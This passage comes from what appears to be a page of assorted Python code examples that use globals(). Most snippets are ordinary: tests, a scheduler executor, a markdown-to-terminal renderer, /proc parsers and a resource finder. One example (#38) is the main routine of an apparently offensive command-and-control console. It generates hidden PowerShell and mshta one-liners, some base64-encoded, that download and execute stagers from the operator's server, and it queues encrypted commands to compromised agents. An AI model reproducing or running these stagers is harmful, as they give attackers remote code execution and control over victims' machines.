        self.assertFalse("b" in locals())
        self.assertFalse("c" in locals())
        self.assertTrue("d" in locals())

        self.assertFalse("a" in globals())
        self.assertFalse("b" in globals())
        self.assertFalse("c" in globals())
        self.assertFalse("d" in globals())

        self.assertEquals(d, "mothra")

        # Re-entering replays the values as they were updated inside the
        # first use (a and b keep their reassigned values).
        with scope:
            self.assertEquals(a, "fajita")
            self.assertEquals(b, "stew")
            self.assertEquals(c, "cake")
            self.assertEquals(d, "mothra")
Пример #27
0
def timecheck():
    """Poll the clock: shorten the polling interval just before the top of
    the hour, trigger umschalt() exactly at hh:00:00, and ping the
    software watchdog once per second (module-global state tracks the
    last-seen times between calls)."""
    timenow = time.strftime('%M%S')
    # For a better timing of the switch, use a shorter sleep-time in the
    # last second before the new hour.
    global sleeptime
    if timenow == '5959':
        sleeptime = 0.001
    else:
        sleeptime = 0.01
    # Timer to switch at every new hour.
    if timenow == '0000':
        global now, then
        # gmtime, so that daylight-saving-time won't do any harm
        now = time.strftime('%H%M%S', time.gmtime())
        # First call ever: force a mismatch so the switch fires.
        if 'then' not in globals():
            then = '999999'
        if now != then:
            logging.debug("Time-Check: the time to switch is now")
            umschalt()
            then = now
    # Timer to notify the software watchdog (has to be called every second).
    global nowsecs, thensecs
    nowsecs = time.strftime('%S')
    if 'thensecs' not in globals():
        thensecs = '99'
    if nowsecs != thensecs:
        watchdogcall()
        thensecs = nowsecs
Пример #28
0
def executor(queue,task):
    """Run one scheduler *task* in this (background) process and report back.

    Captures stdout while the task runs, executes either a registered web2py
    scheduler task (``task.app`` set) or — for testing only — an ``eval`` of
    ``task.function``, and puts a TaskReport (COMPLETED or FAILED with a
    traceback) on *queue*.  Python 2 code (``except BaseException, e``).
    """
    logging.debug('    task started')
    # Swap stdout for a StringIO so the task's prints end up in the report.
    stdout, sys.stdout = sys.stdout, cStringIO.StringIO()
    try:
        if task.app:
            os.chdir(os.environ['WEB2PY_PATH'])
            from gluon.shell import env
            from gluon.dal import BaseAdapter
            from gluon import current
            # Temporarily raise the log level so model imports stay quiet.
            level = logging.getLogger().getEffectiveLevel()
            logging.getLogger().setLevel(logging.WARN)
            _env = env(task.app,import_models=True)
            logging.getLogger().setLevel(level)
            scheduler = current._scheduler
            scheduler_tasks = current._scheduler.tasks
            _function = scheduler_tasks[task.function]
            # Expose the app environment to the task function's globals.
            globals().update(_env)
            args = loads(task.args)
            vars = loads(task.vars, object_hook=_decode_dict)
            result = dumps(_function(*args,**vars))
        else:
            ### for testing purpose only
            result = eval(task.function)(
                *loads(task.args, object_hook=_decode_dict),
                 **loads(task.vars, object_hook=_decode_dict))
        # Restore the real stdout and keep the captured output.
        stdout, sys.stdout = sys.stdout, stdout
        queue.put(TaskReport(COMPLETED, result,stdout.getvalue()))
    except BaseException,e:
        sys.stdout = stdout
        tb = traceback.format_exc()
        queue.put(TaskReport(FAILED,tb=tb))
Пример #29
0
    def test_nonlocal_del(self):
        """Verify `let` scope behaviour when values are deleted inside it."""
        # weird pythonism: the statement `del a` WITHOUT a `global a`
        # causes the compiler to create an empty fast local variable
        # named `a` with a NULL value, which it then deletes (setting
        # the value again to NULL. In other words, the del statement
        # counts as an assignment in the eyes of the compiler.

        global a, b

        a = "remove me"

        with let(a="tacos", b="soda") as my_scope:
            # Inside the scope both names are visible as module globals.
            self.assertTrue("a" in globals())
            self.assertTrue("b" in globals())
            del a
            del b

        # Deleting inside the scope must not leak the names into my_scope.
        self.assertTrue("a" not in my_scope)
        self.assertTrue("b" not in my_scope)

        # The pre-existing global value of `a` is restored on scope exit.
        self.assertEquals(a, "remove me")
        del a

        self.assertTrue("a" not in globals())
        self.assertTrue("b" not in globals())
Пример #30
0
	def delete(self):
		"""Delete a category, refusing when it still has articles or sub-categories.

		Reads request arguments ``type`` (category kind) and ``cid`` (category
		id); writes a JSON ``{"status": bool, "message": ...}`` response.
		Python 2 code (``print e``).
		"""
		result = {"status" : False}
		try:
			c_type = self.get_argument("type")
			c_id = self.get_argument("cid")
			# Dispatch to the model class named after the category type,
			# e.g. type "common" -> Common().query_by_cate_id(...).
			docs = globals()[c_type.capitalize()]().query_by_cate_id(c_id)
			isdel = False
			if docs:
				result["message"] = "该分类还有文章,无法删除"
			else:
				if c_type == "common":
					# "common" categories may have children; block deletion then.
					sub_cate = CommonCategory().query_by_pid(c_id)
					if sub_cate:
						result["message"] = "该分类有子类,无法删除"
					else:
						isdel = True
				else:
					isdel = True
			if isdel:
				# e.g. type "common" -> CommonCategory().delete(cid).
				lastrowid = globals()["%sCategory"%c_type.capitalize()]().delete(c_id)
				result["status"] = True
		except Exception as e:
			print e
			result["message"] = "分类删除异常"
		self.write(json.dumps(result))
		self.finish()
Пример #31
0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import pandas as pd

from ... import opcodes as OperandDef
from ...utils import lazy_import
from ...serialize import Int32Field
from ..operands import DataFrameOperandMixin, DataFrameOperand


# cudf is GPU-only and optional: lazy_import defers the actual import until
# first attribute access — presumably yielding a placeholder when the package
# is missing (TODO confirm lazy_import's missing-package behaviour).
cudf = lazy_import('cudf', globals=globals())


class ChunkStandardizeRangeIndex(DataFrameOperand, DataFrameOperandMixin):
    _op_type_ = OperandDef.STANDARDIZE_RANGE_INDEX

    _axis = Int32Field('axis')

    def __init__(self, prepare_inputs=None, axis=None, output_types=None, **kwargs):
        # Forward everything to the operand base class under its
        # underscore-prefixed field names (_prepare_inputs/_axis/_output_types).
        super().__init__(_prepare_inputs=prepare_inputs, _axis=axis, _output_types=output_types, **kwargs)

    @property
    def axis(self):
        # Axis along which the range index is standardized (backed by the
        # Int32Field `_axis`).
        return self._axis

    @classmethod
Пример #32
0
def build_hl_by_token():
    """Translate the configured highlight map into pygments-token keys.

    For every (token-name, colour-name) pair in ``code_hl``, stores the
    module-level colour function under the corresponding ``token`` attribute
    in ``code_hl_tokens``.  Does nothing when pygments is unavailable.
    """
    if not have_pygments:
        return
    # replace code strs with tokens:
    for token_name, colour_name in list(code_hl.items()):
        token_type = getattr(token, token_name)
        code_hl_tokens[token_type] = globals()[colour_name]
Пример #33
0
def main(md=None,
         filename=None,
         cols=None,
         theme=None,
         c_theme=None,
         bg=None,
         c_no_guess=None,
         display_links=None,
         link_style=None,
         from_txt=None,
         do_html=None,
         code_hilite=None,
         c_def_lexer=None,
         theme_info=None,
         no_colors=None,
         tab_length=4,
         no_change_defenc=False,
         **kw):
    """ md is markdown string. alternatively we use filename and read

    Renders markdown to ANSI-coloured terminal output (or raw HTML when
    `do_html` is set).  Heavily stateful: configures several module globals
    (def_lexer, term_columns, show_links, guess_lexer, ...) as a side effect,
    and recurses into itself once per theme when theme/c_theme == 'all'.
    """

    if sys.version_info[0] == 2 and not no_change_defenc:
        # if I don't do this here, then I'll get probs when being
        # used as a lib:
        # https://github.com/axiros/terminal_markdown_viewer/issues/39
        # If you hate it then switch it off but don't blame me on unicode errs.
        fix_py2_default_encoding()

    tab_length = tab_length or 4
    global def_lexer
    if c_def_lexer:
        def_lexer = c_def_lexer
    # Optional user config: executed and merged into module globals.
    py_config_file = os.path.expanduser("~/.mdv.py")
    if os.path.exists(py_config_file):
        exec_globals = {}
        exec(io.open(py_config_file, encoding='utf-8').read(), exec_globals)
        globals().update(exec_globals)

    # NOTE(review): locals() also captures helper locals created above (e.g.
    # py_config_file); on the recursive main(**args) call below those are
    # swallowed by **kw.
    args = locals()
    if not md:
        if not filename:
            print('Using sample markdown:')
            make_sample()
            md = args['md'] = md_sample
            print(md)
            print
            print('Styling Result')
        else:
            if filename == '-':
                md = sys.stdin.read()
            else:
                with open(filename) as f:
                    md = f.read()

    # style rolers requested?
    global term_columns
    if cols:
        term_columns = int(cols)

    # Demo mode: render the sample once per available theme, recursively.
    if c_theme == 'all' or theme == 'all':
        if c_theme == 'all':
            os.environ['AXC_CODE_THEME'] = os.environ['MDV_CODE_THEME'] = ''
        if theme == 'all':
            os.environ['AXC_THEME'] = os.environ['MDV_THEME'] = ''
        args.pop('kw')
        themes = read_themes()
        for k, v in list(themes.items()):
            if not filename:
                yl = 'You like *%s*, *%s*?' % (k, v['name'])
                args['md'] = md_sample.replace(you_like, yl)
            print(col('%s%s%s' % ('\n\n', '=' * term_columns, '\n'), L))
            # should really create an iterator here:
            if theme == 'all':
                args['theme'] = k
            else:
                args['c_theme'] = k
            print(main(**args))
        return ''

    global show_links
    if display_links:
        show_links = 'i'
    if link_style:  # rules
        show_links = link_style

    if bg and bg == 'light':
        # not in use rite now:
        global background, color
        background = BGL
        color = T

    set_theme(theme, theme_info=theme_info)

    global guess_lexer
    guess_lexer = not c_no_guess

    if not c_theme:
        c_theme = theme or 'default'

    if c_theme == 'None':
        c_theme = None

    if c_theme:
        set_theme(c_theme, for_code=1, theme_info=theme_info)

    if c_theme:
        # info:
        if not have_pygments:
            print(col('No pygments, can not analyze code for hilite', R))

    # Create an instance of the Markdown class with the new extension
    MD = markdown.Markdown(tab_length=int(tab_length),
                           extensions=[
                               AnsiPrintExtension(),
                               TableExtension(),
                               fenced_code.FencedCodeExtension()
                           ])
    if code_hilite:
        md = do_code_hilite(md, code_hilite)
    the_html = MD.convert(md)
    #print the_html
    # html?
    if do_html:
        return the_html

    # who wants html, here is our result:
    try:
        ansi = MD.ansi
    except:
        if the_html:
            # can this happen? At least show:
            print("we have markdown result but no ansi.")
            print(the_html)
        else:
            ansi = 'n.a. (no parsing result)'

    # The RAW html within source, incl. fenced code blocks:
    # phs are numbered like this in the md, we replace back:
    PH = markdown.util.HTML_PLACEHOLDER
    stash = MD.htmlStash
    nr = -1
    tags = Tags()
    for ph in stash.rawHtmlBlocks:
        nr += 1
        raw = html_parser.unescape(ph[0])
        if raw[:3].lower() == '<br':
            raw = '\n'
        pre = '<pre><code'
        if raw.startswith(pre):
            _, raw = raw.split(pre, 1)
            if 'class="' in raw:
                # language:
                lang = raw.split('class="', 1)[1].split('"')[0]
            else:
                lang = ''
            raw = raw.split('>', 1)[1].rsplit('</code>', 1)[0]
            raw = tags.code(raw.strip(), from_fenced_block=1, lang=lang)
        ansi = ansi.replace(PH % nr, raw)

    # don't want these: gone through the extension now:
    # ansi = ansi.replace('```', '')

    # sub part display (the -f feature)
    if from_txt:
        if not from_txt.split(':', 1)[0] in ansi:
            # display from top then:
            from_txt = ansi.strip()[1]
        from_txt, mon_lines = (from_txt + ':%s' %
                               (term_rows - 6)).split(':')[:2]
        mon_lines = int(mon_lines)
        pre, post = ansi.split(from_txt, 1)
        post = '\n'.join(post.split('\n')[:mon_lines])
        ansi = '\n(...)%s%s%s' % ('\n'.join(pre.rsplit(
            '\n', 2)[-2:]), from_txt, post)

    ansi = set_hr_widths(ansi) + '\n'
    if no_colors:
        return clean_ansi(ansi)
    return ansi + '\n'
Пример #34
0
import os
import sys

# Py2/py3 compatible handle on the builtins module, used below to publish
# SERVER_MODE to every module without explicit imports.
if sys.version_info[0] >= 3:
    import builtins
else:
    import __builtin__ as builtins

# We need to include the root directory in sys.path to ensure that we can
# find everything we need when running in the standalone runtime.
root = os.path.dirname(os.path.realpath(__file__))
if sys.path[0] != root:
    sys.path.insert(0, root)

# Grab the SERVER_MODE if it's been set by the runtime
if 'SERVER_MODE' in globals():
    builtins.SERVER_MODE = globals()['SERVER_MODE']
else:
    builtins.SERVER_MODE = None

# Set null device file path to stdout, stdin, stderr if they are None
# (can happen under a GUI runtime with no console attached).
for _name in ('stdin', 'stdout', 'stderr'):
    if getattr(sys, _name) is None:
        setattr(sys, _name, open(os.devnull,
                                 'r' if _name == 'stdin' else 'w'))

import config
from pgadmin import create_app
from pgadmin.utils import u, fs_encoding, file_quote

if config.DEBUG:
Пример #35
0
# /proc data sources and their extraction patterns.  Each *_pattern is a
# template whose $name placeholders mark the numeric fields to capture;
# make_extractor/make_extractor_acc (defined elsewhere — assumed to compile
# these templates) return callables that parse the corresponding file.
vmstat_path = '/proc/vmstat'
vmstat_pattern = """pgpgin $pgin
pgpgout $pgout
.*
pgfault $pgfault
pgmajfault $pgmajfault"""

snmp_path = '/proc/net/snmp'
snmp_pattern = 'Tcp: \S+ \S+ \S+ \S+ $active_conn $passive_conn' 
netdev_path = '/proc/net/dev'
netdev_pattern = 'eth.: $rbytes $rpackets $rerrs $rdrop +\S+ +\S+ +\S+ +\S+ $sbytes $spackets $serrs $sdrop'

diskstat_path = '/proc/diskstats'
diskstat_pattern = '^ +8 +\S+ +\S+ $read $read_merged $read_sectors $read_time $write $write_merged $write_sectors $write_time $progress_io $io_time $io_time_weighted'
# (source, [field names]) pairs, recovered from the $placeholders of each
# <src>_pattern global above.
proc_events = [(src, re.findall('\$(\w+)', globals().get(src+'_pattern'))) for src in ('stat', 'meminfo', 'vmstat', 'snmp', 'netdev', 'diskstat')]

get_stat = make_extractor(stat_path, stat_pattern)
get_meminfo = make_extractor(meminfo_path, meminfo_pattern)
# _acc variants presumably accumulate across multiple matching lines
# (several eth./disk rows) — TODO confirm against make_extractor_acc.
get_vmstat = make_extractor(vmstat_path, vmstat_pattern) 
get_snmp = make_extractor(snmp_path, snmp_pattern)
get_netdev = make_extractor_acc(netdev_path, netdev_pattern)
get_diskstat = make_extractor_acc(diskstat_path, diskstat_pattern)

######################################## kperf info extractor ########################################
kperf_events_map = '''
CPU_CLK_UNHALTED.CORE 3c           # cpu_cycles
CPU_CLK_UNHALTED.BUS 13c           # bus_cycles
INST_RETIRED.ANY c0                # insts
ITLB_MISS_RETIRED c9               # itlb_misses
DTLB_MISSES.ANY 108                # dtlb_misses
Пример #36
0
	def queue(self):
		"""Return the on-disk task queue ("queue.dat") wrapped for list access."""
		backing_list = PersistentObject(list, "queue.dat", namespace=globals())
		return ListWrapper(self, backing_list)
Пример #37
0
import sys

# for compatibility with easy_install; see #2198
__requires__ = 'alembic==1.5.5'

try:
    from importlib.metadata import distribution
except ImportError:
    try:
        from importlib_metadata import distribution
    except ImportError:
        from pkg_resources import load_entry_point


def importlib_load_entry_point(spec, group, name):
    """Load the entry point *name* in *group* for the distribution in *spec*.

    *spec* has the ``"dist==version"`` shape; only the distribution name is
    used for the lookup.  Raises StopIteration when no entry point matches,
    exactly like the original ``next()``-on-a-generator implementation.
    """
    dist_name = spec.partition('==')[0]

    def _candidates():
        for entry_point in distribution(dist_name).entry_points:
            if entry_point.group == group and entry_point.name == name:
                yield entry_point

    return next(_candidates()).load()


# Install the importlib-based loader only if the pkg_resources fallback chain
# above did not already bind a `load_entry_point` name.
globals().setdefault('load_entry_point', importlib_load_entry_point)


if __name__ == '__main__':
    # Bug fix: this generated script only imports `sys` at module level, so
    # the `re.sub` below raised NameError when executed directly.
    import re

    # Strip a trailing "-script.py(w)"/".exe" from argv[0] so the console
    # script reports its plain command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(load_entry_point('alembic==1.5.5', 'console_scripts', 'alembic')())
Пример #38
0
def main():
    """Interactive C&C console: start the web server, print the generated
    one-liner payloads at increasing stealth levels, then enter the
    command-dispatch REPL.  Python 2 code (print statements, raw_input).
    """
    signal.signal(signal.SIGINT, signal_handler)
    header.Banner()
    #config.set_key()
    CC = []
    # Prompt for the C&C endpoint until host/port are configured.
    if config.HOST == "" or config.PORT == "":
        while len(CC) == 0:
            CC = raw_input('Enter a DN/IP:port for C&C: ip:port: ')
        CC = CC.split(':')
        config.set_port(CC[1])
        config.set_ip(CC[0])
    #proxy = raw_input('Enter PROXY:')
    #if proxy:
    #    ip = proxy
    server = threading.Thread(target=webserver.main, args=())
    server.start()
    print '+' + '-' * 60 + '+'
    cmd().help()
    print '+' + '-' * 60 + '+'
    print bcolors.OKBLUE + '(LOW):' + bcolors.ENDC
    print 'mshta http://%s:%s%s' % (config.HOST, config.PORT,
                                    config.hta_payload)
    print 'powershell -c \"mshta http://%s:%s%s\"' % (config.HOST, config.PORT,
                                                      config.hta_payload)
    config.PAYLOADS.append('\nmshta http://%s:%s%s' %
                           (config.HOST, config.PORT, config.hta_payload))
    print ''
    # Base64-encoded download-and-IEX stagers, as background job and as a
    # hidden child process.
    commandJ = "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))}"
    commandP = 'Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(\'{payload}\')))" -WindowStyle Hidden'
    payload = "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{raw}');IEX($s)"
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    payload = payload.encode('base64').replace('\n', '')
    print bcolors.OKBLUE + '(MEDIUM):' + bcolors.ENDC
    print '---+Powershell JOB Payload+---\n' + commandJ.replace(
        '{payload}', payload)
    print ''
    print '---+Powershell New Process Payload+---\n' + commandP.replace(
        '{payload}', payload)
    print ''
    config.PAYLOADS.append(commandJ.replace('{payload}', payload))
    config.PAYLOADS.append(commandP.replace('{payload}', payload))
    print bcolors.OKBLUE + '(HIGH):' + bcolors.ENDC
    commandF = "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))"
    payload = "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{hjf}');IEX($s)"
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{hjf}", hjf_payload)
    payload = payload.encode('base64').replace('\n', '')
    print '---+Powershell JOB + File Payload+---'
    print commandF.replace('{payload}', payload)
    print ''
    config.PAYLOADS.append(commandF.replace('{payload}', payload))
    commandF = "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))"
    payload = "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{hjfs}');IEX($s)"
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{hjfs}", hjfs_payload)
    payload = payload.encode('base64').replace('\n', '')
    print '---+Powershell JOB + File +SCT Payload+---'
    print commandF.replace('{payload}', payload)
    print ''
    config.PAYLOADS.append(commandF.replace('{payload}', payload))
    # Plain (non-base64) download-string one-liners.
    payload = """powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://{ip}:{port}{raw}');Invoke-Expression $h;\""""
    payload2 = """powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{raw}');\""""
    payload3 = """powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{raw}');\""""
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    payload2 = payload2.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    payload3 = payload3.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    print '---+ Powershell simple payloads +---'
    print payload
    print payload2
    print payload3
    print ''
    config.PAYLOADS.append(payload)
    config.PAYLOADS.append(payload2)
    config.PAYLOADS.append(payload3)
    #=======================================================
    payload = """powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');Invoke-Expression $h;\""""
    payload2 = """powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');\""""
    payload3 = """powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');\""""
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b64stager}", b64_stager)
    payload2 = payload2.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b64stager}", b64_stager)
    payload3 = payload3.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b64stager}", b64_stager)
    print '---+ Powershell base64 stager +---'
    print payload
    print payload2
    print payload3
    print ''
    config.PAYLOADS.append('---+ Powershell base64 stager +---')
    config.PAYLOADS.append(payload)
    config.PAYLOADS.append(payload2)
    config.PAYLOADS.append(payload3)
    #=======================================================
    payload = """powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b52stager}');Invoke-Expression $h;\""""
    payload2 = """powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b52stager}');\""""
    payload3 = """powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b52stager}');\""""
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b52stager}", b52_stager)
    payload2 = payload2.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b52stager}", b52_stager)
    payload3 = payload3.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b52stager}", b52_stager)
    print '---+ Powershell base52 stager +---'
    print payload
    print payload2
    print payload3
    print ''
    config.PAYLOADS.append('---+ Powershell base52 stager +---')
    config.PAYLOADS.append(payload)
    config.PAYLOADS.append(payload2)
    config.PAYLOADS.append(payload3)
    config.PAYLOAD()
    config.STAGER()
    cspayload()

    print '+' + '-' * 60 + '+'
    # Command REPL: dispatch known commands to cmd(); when an agent is
    # selected, queue unknown input as an encrypted command for that agent.
    while True:
        if config.POINTER == 'main':
            command = raw_input('(%s : %s) ' % (config.BASE, config.POINTER))
        else:
            command = raw_input(
                '(%s : Agent(%s)-%s) ' %
                (config.BASE, str(config.AGENTS[config.POINTER][0]),
                 config.AGENTS[config.POINTER][1]))
        bcommand = command.strip().split()
        if bcommand:
            if bcommand[0] in cmd.COMMANDS:
                result = getattr(globals()['cmd'](), bcommand[0])(bcommand)
            elif bcommand[0] not in cmd.COMMANDS and config.POINTER != 'main':
                config.COMMAND[config.POINTER].append(
                    encrypt(AESKey, command.strip()))
Пример #39
0
import sys
import argparse
import cStringIO

##### parse arguments
# Command-line interface for the vcf scanner; the parsed namespace is
# published as the module-level global `args` for the helper functions.
parser = argparse.ArgumentParser(description="Scans vcf files and returns lines with somatic/germline mutations. Also cleans up the data a little bit.");
parser.add_argument('-i', '--input', required=True, help="The name of the (parsed) input vcf file.");
parser.add_argument('-s', '--somatic', action='store_true', help="If -s is specified, will output somatic mutations.");
parser.add_argument('-g', '--germline', action='store_true', help="If -g is specified, will output germline mutations.");
parser.add_argument('-a', '--all', action='store_true', help="If -a is specified, will output every line.");
parser.add_argument('-t', '--tcgaid_append', action='store_true', help="If -t is specified, will append the TCGA ID to the end of every line (if the program can find it).");
desc_T = "If -T is specified, will attempt to search for a TCGA ID within the file and output it. This will be the only output.";
parser.add_argument('-T', '--tcgaid_only', action='store_true', help=desc_T);

_args = parser.parse_args();
# Expose the namespace as a module global (equivalent to `args = _args`).
globals()['args'] = _args;
#####

##### functions #####

# finds the TCGA ID inside the file
# looks at the file name and the first line of the file to see if it can find
# a TCGA ID. If it finds more than one, it uses the longer one.
def findID(file_name,first_line):
    file_name_index = file_name.find("TCGA-");
    first_line_index = first_line.find("TCGA-");
    tcga_id_file = ""
    tcga_id_line = ""
    tcga_id = ""

    if file_name_index != -1:
Пример #40
0
def FindResource(name):
  """Search for a named resource.

  Returns a tuple of (filename, file contents as string), where at
  least one element is not None, depending on the abilities of the
  entity where the resource was found.  E.g. resources from PAR files
  don't have independent filenames.

  The lookup tries, in order: the module __loader__, a path relative to
  this module's __file__, sitecustomize.GOOGLEBASE, the GOOGLEBASE
  environment variable, and finally srcfs READONLY paths.

  Raises IOError if the name is not found, or the resource cannot be opened.
  """

  # 1: a PAR/zip-style loader can hand back the bytes directly (no filename).
  loader = globals().get('__loader__', None)
  if loader and hasattr(loader, 'get_data'):
    try:
      _ResourceLock.acquire()
      try:
        data = loader.get_data(name)
      finally:
        _ResourceLock.release()
      _Log('# loading resource %s via __loader__\n' % (name))
      return (None, data)
    except IOError:
      pass
    # endtry
  # endif

  # 2: resolve relative to the source tree containing this module.
  # (Renamed from `file` to avoid shadowing the builtin.)
  src_file = globals().get('__file__', None)
  if src_file:
    # __file__ is like <root>/google{2,3}/pyglib/resources.py
    root_plus_two = os.path.dirname(os.path.abspath(src_file))
    if root_plus_two and os.path.isdir(root_plus_two):
      root = os.path.dirname(os.path.dirname(root_plus_two))
      filename = os.path.join(root, name)
      if os.path.isfile(filename):
        _Log('# loading resource %s from %s via __file__\n' % (name, filename))
        return (filename, None)
      # endif
    # endif
  # endif

  # 3: sitecustomize may advertise the base directory.
  # Bug fix: dict.has_key() was removed in Python 3; the `in` operator is
  # equivalent and works in both Python 2 and 3.
  if 'sitecustomize' in sys.modules:
    sitecustomize = sys.modules['sitecustomize']
    root = getattr(sitecustomize, 'GOOGLEBASE', None)
    if root and os.path.isdir(root):
      filename = os.path.join(root, name)
      if os.path.isfile(filename):
        _Log('# loading resource %s from %s via sitecustomize\n' % (name,
                                                                    filename))
        return (filename, None)
      # endif
    # endif
  # endif

  # 4: environment-variable override.
  root = os.environ.get('GOOGLEBASE', None)
  if root and os.path.isdir(root):
    filename = os.path.join(root, name)
    if os.path.isfile(filename):
      _Log('# loading resource %s from %s via GOOGLEBASE\n' % (name, filename))
      return (filename, None)
    # endif
  # endif

  # 5 see if the file is under a READONLY srcfs path
  # First check make-dbg or mach style relative srcfs.
  if name.startswith("../READONLY"):
    return (name, None)
  # Next check blaze style full paths.
  # Blaze input is like "/home/foo/client/google3/path/to/file.txt"
  # Find the google3 dir within the name and see if it has a READONLY
  readonly_path = None
  resource_name = None
  head = name
  # Start at the back of the path and go until google3.
  # This assumes there's no google3 anywhere else in the path.
  # Note: os.path.split('/') returns ('/', '') and
  # os.path.split('foo') return ('', 'foo').
  # Thus we know that we have run out of path components when head is
  # equal to '/' or the empty string.
  while readonly_path is None and head != '' and head != '/':
    (head, tail) = os.path.split(head)
    if resource_name is not None:
      resource_name = os.path.join(tail, resource_name)
    else:
      resource_name = tail

    if tail == 'google3':
      readonly_path = os.path.join(head, 'READONLY')
    # endif
  #endwhile
  if readonly_path is not None:
    filename = os.path.join(readonly_path, resource_name)
    if os.path.isfile(filename):
      _Log('# loading resource %s from %s via srcfs READONLY\n' % (name,
                                                                 filename))
      return (filename, None)
    # endif
  #endif

  raise IOError(errno.ENOENT, 'Resource not found', name)
Пример #41
0
def get_action(cur_state, strategy_function):
    """Look up the module-level strategy named *strategy_function* and apply
    it to *cur_state*, returning the chosen action."""
    strategy = globals()[strategy_function]
    return strategy(cur_state)
Пример #42
0
def main(argv=None):
    """script main.

    parses command line options in sys.argv, unless *argv* is given.
    """

    if argv is None:
        argv = sys.argv

    parser = E.OptionParser(
        version="%prog version: $Id: diff_gff.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])

    parser.add_option("-e", "--write-equivalent", dest="write_equivalent",
                      help="write equivalent entries [default=%default].", action="store_true")

    parser.add_option("-f", "--write-full", dest="write_full",
                      help="write full gff entries [default=%default].", action="store_true")

    parser.add_option("-o", "--format=", dest="format",
                      help="output format [flat|multi-line] [default=%default]")

    parser.add_option("-p", "--add-percent", dest="add_percent", action="store_true",
                      help="add percentage columns [default=%default].")

    parser.add_option("-a", "--as-gtf", "--is-gtf", dest="as_gtf", action="store_true",
                      help="input is in gtf format. Output on overlapping genes will be output [default=%default].")

    parser.add_option("-s", "--ignore-strand", dest="ignore_strand", action="store_true",
                      help="ignore strand information [default=%default].")

    parser.set_defaults(
        write_equivalent=False,
        write_full=False,
        format="flat",
        add_percent=False,
        ignore_strand=False,
        as_gtf=False,
    )

    (options, args) = E.Start(parser, add_output_options=True)

    if len(args) != 2:
        raise ValueError("two arguments required")

    input_filename1, input_filename2 = args

    # duplicated features cause a problem. Make sure
    # features are non-overlapping by running
    # gff_combine.py on GFF files first.

    E.info("reading data")

    if options.as_gtf:
        gff1 = GTF.readFromFile(IOTools.openFile(input_filename1, "r"))
        gff2 = GTF.readFromFile(IOTools.openFile(input_filename2, "r"))
        overlaps_genes = []
    else:
        gff1 = GTF.readFromFile(IOTools.openFile(input_filename1, "r"))
        gff2 = GTF.readFromFile(IOTools.openFile(input_filename2, "r"))

    E.info("reading data finished: %i, %i" % (len(gff1), len(gff2)))

    # removing everything but exons
    gff1 = [x for x in gff1 if x.feature == "exon"]
    gff2 = [x for x in gff2 if x.feature == "exon"]

    E.info("after keeping only 'exons': %i, %i" % (len(gff1), len(gff2)))

    if options.ignore_strand:
        for e in gff1:
            e.strand = "."
        for e in gff2:
            e.strand = "."

    E.info("sorting exons")

    gff1.sort(key=lambda x: (x.contig, x.strand, x.start, x.end))
    gff2.sort(key=lambda x: (x.contig, x.strand, x.start, x.end))

    E.info("sorting exons finished")

    subtotals = []
    subtotal = Counts(add_percent=options.add_percent)

    outfile_diff = getFile(options, "diff")
    outfile_overlap = getFile(options, "overlap")

    if options.as_gtf:
        overlapping_genes = []
    else:
        overlapping_genes = None

    i1, i2 = 0, 0
    n1 = len(gff1)
    n2 = len(gff2)
    first_entry2, first_entry1 = None, None

    while i1 < n1 and i2 < n2:

        entry1 = gff1[i1]
        entry2 = gff2[i2]

        E.debug("1: i1=%i n1=%i entry1=%s" % (i1, n1, str(entry1)))
        E.debug("2: i2=%i n2=%i entry2=%s" % (i2, n2, str(entry2)))

        # when chromosome/strand have changed in both (and are the same), print
        # summary info:
        if first_entry1:

            if (first_entry1.contig != entry1.contig or
